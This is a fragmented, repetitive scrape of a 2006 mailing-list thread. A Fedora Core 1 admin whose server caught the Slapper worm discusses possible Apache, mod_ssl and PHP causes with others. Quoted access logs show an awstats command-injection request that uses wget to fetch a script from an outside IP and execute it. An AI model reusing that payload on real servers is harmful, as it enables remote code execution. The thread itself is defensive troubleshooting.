Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1, but in
analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache
SSL server which
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Michael Mansour wrote:
Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1, but in
analysing now how
Hi James,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Michael Mansour wrote:
Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and
then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1,
On Mon, 2006-01-23 at 15:42 -0500, James Kosin wrote:
Michael,
Try my version of httpd here:
http://support.intcomgrp.com/~jkosin
It has been effective against the worm so far.
James, what is in your package that we haven't included in our Apache?
I was under the assumption that we had
Michael Mansour wrote:
220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
HTTP/1.1
403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Jesse Keating wrote:
James, what is in your package that we haven't included in our Apache?
I was under the assumption that we had fixed all the CVEs related to the
slapper worm and that our users were safe. If this isn't the case, we
have a
Hi Kelson,
Michael Mansour wrote:
220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
HTTP/1.1
403 344 - Mozilla/4.0
On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote:
My version takes care of the mod_ssl issue he already disabled. FC1
doesn't have a fix or if so it hasn't gone through QA yet.
Do you have a CVE for the ssl issue? I'd like to see if it is somewhere
in the QA pipeline.
--
Jesse
On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote:
I'm using:
perl-5.8.3-17.4.legacy
httpd-2.0.51-1.9.legacy
openssl-0.9.7a-33.13.legacy
Are there any updates FL can do to any of the packages to fix/block slapper
from an FC1 machine?
What version of php are you running?
Marc.
Hi Marc,
On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote:
I'm using:
perl-5.8.3-17.4.legacy
httpd-2.0.51-1.9.legacy
openssl-0.9.7a-33.13.legacy
Are there any updates FL can do to any of the packages to fix/block slapper
from an FC1 machine?
What version of php are
Hi Marc,
On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote:
No I'm not sure. Reading through the link above, it does seem that you've
hit
the nail on the head with this one. I have two other FC1 machines and they
weren't affected by Slapper (even when the 3rd one was). The FC1
On Monday 23 January 2006 14:32, Michael Mansour wrote:
403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;) 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
12 matches
Mail list logo